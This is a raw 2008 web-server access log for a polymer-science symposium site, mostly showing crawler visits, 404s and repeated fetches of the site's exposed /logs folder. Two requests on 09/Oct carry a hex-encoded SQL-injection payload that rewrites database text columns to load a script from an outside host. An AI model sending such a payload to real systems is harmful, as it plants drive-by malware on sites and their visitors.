69.58.178.35 - - [05/Oct/2008:16:55:14 -0400] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" 0 www.geil-symposium.com
69.58.178.35 - - [05/Oct/2008:16:55:15 -0400] "GET /logs/ HTTP/1.1" 200 385 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" 0 www.geil-symposium.com
69.58.178.35 - - [05/Oct/2008:16:55:16 -0400] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" 0 www.geil-symposium.com
69.58.178.35 - - [05/Oct/2008:16:55:17 -0400] "GET /logs/access.log HTTP/1.1" 200 150425 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" 0 www.geil-symposium.com
69.58.178.35 - - [05/Oct/2008:16:55:18 -0400] "GET /logs/error.log HTTP/1.1" 200 97576 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" 0 www.geil-symposium.com
85.73.188.210 - - [05/Oct/2008:18:50:11 -0400] "GET /logs/access.log HTTP/1.1" 200 150887 "-" "wptotidjxarfDrqljgrfsrDbjjleqalpcke" 16 www.geil-symposium.com
85.73.188.210 - - [05/Oct/2008:21:57:28 -0400] "GET /logs/access.log HTTP/1.1" 200 151045 "-" "gysyqk wkncfgsqiBw gxytfdorifxd" 28 www.geil-symposium.com
207.210.94.106 - - [05/Oct/2008:23:25:44 -0400] "GET / HTTP/1.1" 200 326 "http://www.camfleet.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
64.246.187.42 - - [05/Oct/2008:23:41:49 -0400] "GET /robots.txt HTTP/1.0" 404 - "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
64.246.187.42 - - [05/Oct/2008:23:41:49 -0400] "GET / HTTP/1.1" 200 326 "http://www.whois.sc/geil-symposium.com" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
66.249.71.115 - - [06/Oct/2008:00:04:01 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.117 - - [06/Oct/2008:00:04:01 -0400] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.117 - - [06/Oct/2008:00:04:02 -0400] "GET /logs/ HTTP/1.1" 200 385 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.115 - - [06/Oct/2008:00:14:57 -0400] "GET /publications.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.117 - - [06/Oct/2008:00:15:15 -0400] "GET /transportation.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 1 www.geil-symposium.com
121.45.85.1 - - [06/Oct/2008:06:36:07 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3" 0 www.geil-symposium.com
38.99.13.124 - - [06/Oct/2008:07:17:45 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
208.111.154.9 - - [06/Oct/2008:12:57:08 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.9 - - [06/Oct/2008:12:57:08 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
74.6.17.177 - - [06/Oct/2008:15:29:37 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.17.177 - - [06/Oct/2008:15:29:37 -0400] "GET /Sponsors.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
64.128.171.4 - - [06/Oct/2008:19:13:58 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Ocelli/1.4 (http://www.globalspec.com/Ocelli)" 0 www.geil-symposium.com
64.128.171.4 - - [06/Oct/2008:19:13:58 -0400] "GET / HTTP/1.1" 200 326 "-" "Ocelli/1.4 (http://www.globalspec.com/Ocelli)" 0 www.geil-symposium.com
71.185.198.227 - - [06/Oct/2008:19:18:39 -0400] "GET /Sponsors.html HTTP/1.1" 404 - "http://www.google.com/search?hl=en&q=Tsuey-Chen+Long%2C+Ph.D&btnG=Google+Search&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" 0 www.geil-symposium.com
71.185.198.227 - - [06/Oct/2008:19:18:39 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" 0 www.geil-symposium.com
74.6.22.165 - - [06/Oct/2008:20:11:23 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.165 - - [06/Oct/2008:20:11:24 -0400] "GET /logs/access.log HTTP/1.0" 200 154805 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.165 - - [06/Oct/2008:20:37:51 -0400] "GET / HTTP/1.0" 200 310 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.117 - - [06/Oct/2008:23:37:48 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.117 - - [06/Oct/2008:23:37:48 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.53 - - [07/Oct/2008:02:21:35 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 www.geil-symposium.com
66.249.71.117 - - [07/Oct/2008:03:16:33 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.117 - - [07/Oct/2008:03:16:33 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
86.54.75.170 - - [07/Oct/2008:03:32:53 -0400] "GET /logs/access.log HTTP/1.1" 200 156217 "-" "dcp0bnsxwkggmcsgjjvouauxxd" 22 www.geil-symposium.com
86.54.75.170 - - [07/Oct/2008:04:24:18 -0400] "GET /logs/access.log HTTP/1.1" 200 156365 "-" "6icyglofvba yCq6yhuyr6ecxjertc" 7 www.geil-symposium.com
207.210.94.74 - - [07/Oct/2008:04:41:36 -0400] "GET / HTTP/1.1" 200 326 "http://www.camfleet.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
131.107.0.111 - - [07/Oct/2008:05:58:46 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
74.6.8.117 - - [07/Oct/2008:06:02:48 -0400] "GET /transportation.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
86.54.75.170 - - [07/Oct/2008:06:25:42 -0400] "GET /logs/access.log HTTP/1.1" 200 157109 "-" "lmj8oxweegmIbvnkjpmctc" 12 www.geil-symposium.com
38.104.58.118 - - [07/Oct/2008:07:29:30 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "panscient.com" 0 www.geil-symposium.com
38.104.58.118 - - [07/Oct/2008:07:29:30 -0400] "GET / HTTP/1.1" 200 326 "-" "panscient.com" 0 www.geil-symposium.com
208.111.154.9 - - [07/Oct/2008:07:32:58 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.9 - - [07/Oct/2008:07:32:58 -0400] "GET /Venue.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
205.178.184.155 - - [07/Oct/2008:10:08:30 -0400] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
205.178.184.155 - - [07/Oct/2008:10:09:00 -0400] "GET / HTTP/1.1" 200 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
38.99.13.124 - - [07/Oct/2008:10:36:47 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
61.247.221.44 - - [07/Oct/2008:10:58:20 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" 0 www.geil-symposium.com
61.247.221.44 - - [07/Oct/2008:10:58:20 -0400] "GET / HTTP/1.1" 200 326 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" 0 www.geil-symposium.com
202.179.180.45 - - [07/Oct/2008:15:23:55 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
202.179.180.45 - - [07/Oct/2008:15:23:58 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
74.6.8.117 - - [07/Oct/2008:17:25:27 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.117 - - [07/Oct/2008:17:25:28 -0400] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.117 - - [07/Oct/2008:17:25:29 -0400] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.117 - - [07/Oct/2008:18:17:11 -0400] "GET /Registration.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
205.178.184.155 - - [07/Oct/2008:18:49:37 -0400] "GET / HTTP/1.1" 200 322 "-" "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
205.178.184.155 - - [07/Oct/2008:18:49:38 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
205.178.184.153 - - [07/Oct/2008:18:59:10 -0400] "HEAD /logs HTTP/1.1" 301 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
205.178.184.153 - - [07/Oct/2008:18:59:10 -0400] "HEAD /logs/ HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
205.178.184.153 - - [07/Oct/2008:18:59:23 -0400] "GET /logs HTTP/1.1" 301 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" 0 www.geil-symposium.com
205.178.184.153 - - [07/Oct/2008:18:59:23 -0400] "GET /logs/ HTTP/1.1" 200 381 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" 0 www.geil-symposium.com
208.111.154.9 - - [07/Oct/2008:20:15:42 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.9 - - [07/Oct/2008:20:15:42 -0400] "GET /Program.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
74.6.8.117 - - [07/Oct/2008:21:03:33 -0400] "GET /Scholarship.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.105 - - [07/Oct/2008:23:17:18 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.105 - - [07/Oct/2008:23:17:18 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
65.98.224.6 - - [07/Oct/2008:23:43:14 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" 0 www.geil-symposium.com
65.98.224.6 - - [07/Oct/2008:23:43:43 -0400] "GET /transportation.html HTTP/1.0" 404 - "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" 0 www.geil-symposium.com
65.98.224.6 - - [07/Oct/2008:23:44:13 -0400] "GET /publications.html HTTP/1.0" 404 - "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" 0 www.geil-symposium.com
65.98.224.6 - - [07/Oct/2008:23:44:46 -0400] "GET /accommodations.html HTTP/1.0" 404 - "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" 0 www.geil-symposium.com
65.98.224.6 - - [07/Oct/2008:23:45:13 -0400] "GET /Venue.html HTTP/1.0" 404 - "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" 0 www.geil-symposium.com
65.98.224.6 - - [07/Oct/2008:23:45:42 -0400] "GET /Scholarship.html HTTP/1.0" 404 - "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" 0 www.geil-symposium.com
65.98.224.6 - - [07/Oct/2008:23:46:12 -0400] "GET /Registration.html HTTP/1.0" 404 - "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" 0 www.geil-symposium.com
86.54.75.170 - - [08/Oct/2008:00:32:30 -0400] "GET /logs/access.log HTTP/1.1" 200 163304 "-" "hjvjkijc0pplunuvqjrkuqveIIwl unhwIuibt" 20 www.geil-symposium.com
67.195.37.105 - - [08/Oct/2008:01:14:39 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.105 - - [08/Oct/2008:01:14:39 -0400] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.105 - - [08/Oct/2008:01:14:58 -0400] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.105 - - [08/Oct/2008:03:29:50 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.111.154.9 - - [08/Oct/2008:05:36:35 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.9 - - [08/Oct/2008:05:36:35 -0400] "GET /Sponsors.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
216.145.54.196 - - [08/Oct/2008:07:01:57 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
203.209.252.68 - - [08/Oct/2008:08:44:26 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [08/Oct/2008:08:44:27 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
67.195.37.105 - - [08/Oct/2008:10:03:36 -0400] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.105 - - [08/Oct/2008:10:03:57 -0400] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
75.101.240.133 - - [08/Oct/2008:11:50:32 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" 0 www.geil-symposium.com
38.99.13.124 - - [08/Oct/2008:12:12:13 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
38.104.58.118 - - [08/Oct/2008:15:42:50 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "panscient.com" 0 www.geil-symposium.com
38.104.58.118 - - [08/Oct/2008:15:42:50 -0400] "GET / HTTP/1.1" 200 326 "-" "panscient.com" 0 www.geil-symposium.com
38.104.58.118 - - [08/Oct/2008:15:42:53 -0400] "GET /logs HTTP/1.1" 301 343 "-" "panscient.com" 0 www.geil-symposium.com
38.104.58.118 - - [08/Oct/2008:15:42:53 -0400] "GET /logs/ HTTP/1.1" 200 385 "-" "panscient.com" 0 www.geil-symposium.com
199.133.213.201 - - [08/Oct/2008:16:29:18 -0400] "GET /publications.html HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
208.80.194.33 - - [08/Oct/2008:17:01:39 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR Enabled; SIMBAR={DC67A667-F6BB-4169-B6F7-ACA20AF1433F}; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
74.6.18.251 - - [08/Oct/2008:18:22:44 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.251 - - [08/Oct/2008:18:22:44 -0400] "GET /Program.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
221.0.170.125 - - [08/Oct/2008:22:12:01 -0400] "GET /publications.html HTTP/1.1" 404 - "http://www.google.com/search?hl=en&newwindow=1&q=Appl.+Polym.+Symp.&start=30&sa=N" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; GreenBrowser)" 0 www.geil-symposium.com
221.0.170.125 - - [08/Oct/2008:22:12:02 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "GreenBrowser" 0 www.geil-symposium.com
60.50.53.164 - - [09/Oct/2008:04:46:14 -0400] "GET /logs/access.log?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 95553 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" 88 www.geil-symposium.com
60.50.53.164 - - [09/Oct/2008:04:46:27 -0400] "GET /logs/access.log?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 101361 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" 101 www.geil-symposium.com
66.34.204.26 - - [09/Oct/2008:07:09:27 -0400] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
66.34.204.26 - - [09/Oct/2008:07:09:27 -0400] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
66.34.204.26 - - [09/Oct/2008:07:09:27 -0400] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
193.48.219.28 - - [09/Oct/2008:10:49:51 -0400] "GET /publications.html HTTP/1.0" 404 - "http://www.google.fr/search?hl=fr&lr=&q=%22Pratt%22+%22Chain+mobility+*+crystallization%22" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 0 www.geil-symposium.com
88.70.228.240 - - [09/Oct/2008:12:37:19 -0400] "GET /images/Philip_H_Geil_logo.jpg HTTP/1.1" 404 - "http://images.google.com/images?q=geil&svnum=20&hl=en&lr=&c2coff=1&safe=off&start=380&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 0 www.geil-symposium.com
88.70.228.240 - - [09/Oct/2008:12:37:20 -0400] "GET /images/Philip_H_Geil_logo.jpg HTTP/1.1" 404 - "http://images.google.com/images?q=geil&svnum=20&hl=en&lr=&c2coff=1&safe=off&start=380&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 0 www.geil-symposium.com
88.70.228.240 - - [09/Oct/2008:12:37:21 -0400] "GET /images/Philip_H_Geil_logo.jpg HTTP/1.1" 404 - "http://images.google.com/images?q=geil&svnum=20&hl=en&lr=&c2coff=1&safe=off&start=380&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 0 www.geil-symposium.com
38.99.13.124 - - [09/Oct/2008:13:14:51 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
66.249.71.116 - - [09/Oct/2008:16:44:30 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.117 - - [09/Oct/2008:16:44:30 -0400] "GET /Registration.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
88.208.228.107 - - [09/Oct/2008:17:24:54 -0400] "GET /logs/access.log HTTP/1.1" 200 172982 "-" "puEmc bdjkpb uumvdubnfkwm" 0 www.geil-symposium.com
202.179.180.45 - - [09/Oct/2008:17:52:47 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
202.179.180.45 - - [09/Oct/2008:17:52:48 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
193.47.80.36 - - [09/Oct/2008:21:05:55 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
193.47.80.36 - - [09/Oct/2008:21:05:55 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 0 www.geil-symposium.com
174.145.29.232 - - [09/Oct/2008:23:43:15 -0400] "GET / HTTP/1.1" 200 326 "http://www.google.com/search?hl=en&safe=off&rlz=1T4GGIH_enUS236US236&q=%22parent+directory%22%2C+geil&btnG=Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
208.111.154.9 - - [09/Oct/2008:23:51:35 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
